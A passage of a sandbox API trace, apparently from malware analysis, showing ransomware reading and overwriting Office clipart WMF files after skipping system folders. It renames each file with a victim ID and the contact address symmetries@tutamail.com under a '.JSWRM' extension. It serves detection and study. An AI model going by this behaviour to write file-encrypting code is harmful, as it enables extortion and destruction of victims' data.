lpDistanceToMoveHigh=0x0) returned 0x0 [0086.957] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2210, lpOverlapped=0x0) returned 1 [0086.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.957] CloseHandle (hObject=0x314) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0086.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0086.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0086.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0086.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0086.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.957] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0086.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0086.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0086.958] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187859.WMF", cAlternateFileName="")) returned 1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2=".") returned 1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="..") returned 1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="...") returned 1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="windows") returned -1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="recovery") returned -1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="perflogs") returned -1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="documents and settings") returned 1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="system volume information") returned -1 [0086.958] lstrcmpiW (lpString1="J0187859.WMF", lpString2="msocache") returned -1 [0086.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0086.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187859.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187859.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187859.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0086.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187859.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187859.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187859.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0086.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.959] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2732) returned 1 [0086.959] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaa0) returned 0x22fd48 [0086.959] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xaa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xaa0, lpOverlapped=0x0) returned 1 [0086.961] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.961] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xaa0, lpOverlapped=0x0) returned 1 [0086.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0086.961] CloseHandle (hObject=0x314) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0086.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0086.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0086.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0086.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.961] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0086.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.962] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2394, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187861.WMF", cAlternateFileName="")) returned 1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2=".") returned 1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="..") returned 1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="...") returned 1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="windows") returned -1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="recovery") returned -1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="perflogs") returned -1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="documents and settings") returned 1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="system volume information") returned -1 [0086.962] lstrcmpiW (lpString1="J0187861.WMF", lpString2="msocache") returned -1 [0086.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0086.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187861.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187861.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187861.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0086.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0086.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187861.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187861.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187861.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0086.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0086.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0086.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.963] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9108) returned 1 [0086.963] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2390) returned 0x24d210 [0086.963] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2390, lpOverlapped=0x0) returned 1 [0086.965] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.965] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2390, lpOverlapped=0x0) returned 1 [0086.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.965] CloseHandle (hObject=0x314) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0086.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0086.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0086.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0086.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0086.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.966] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0086.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0086.966] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a44, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187863.WMF", cAlternateFileName="")) returned 1 [0086.966] lstrcmpiW (lpString1="J0187863.WMF", lpString2=".") returned 1 [0086.966] lstrcmpiW (lpString1="J0187863.WMF", lpString2="..") returned 1 [0086.966] lstrcmpiW (lpString1="J0187863.WMF", lpString2="...") returned 1 [0086.966] lstrcmpiW (lpString1="J0187863.WMF", lpString2="windows") returned -1 [0086.966] lstrcmpiW (lpString1="J0187863.WMF", lpString2="recovery") returned -1 [0086.966] lstrcmpiW (lpString1="J0187863.WMF", lpString2="perflogs") returned -1 [0086.966] lstrcmpiW (lpString1="J0187863.WMF", lpString2="documents and settings") returned 1 [0086.967] lstrcmpiW (lpString1="J0187863.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.967] lstrcmpiW (lpString1="J0187863.WMF", lpString2="system volume information") returned -1 [0086.967] lstrcmpiW (lpString1="J0187863.WMF", lpString2="msocache") returned -1 [0086.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0086.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187863.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187863.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187863.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0086.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0086.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187863.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187863.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187863.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0086.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0086.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.967] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10820) returned 1 [0086.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a40) returned 0x24d210 [0086.967] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a40, lpOverlapped=0x0) returned 1 [0086.969] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.969] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a40, lpOverlapped=0x0) returned 1 [0086.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.970] CloseHandle (hObject=0x314) returned 1 [0086.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0086.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0086.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0086.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0086.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 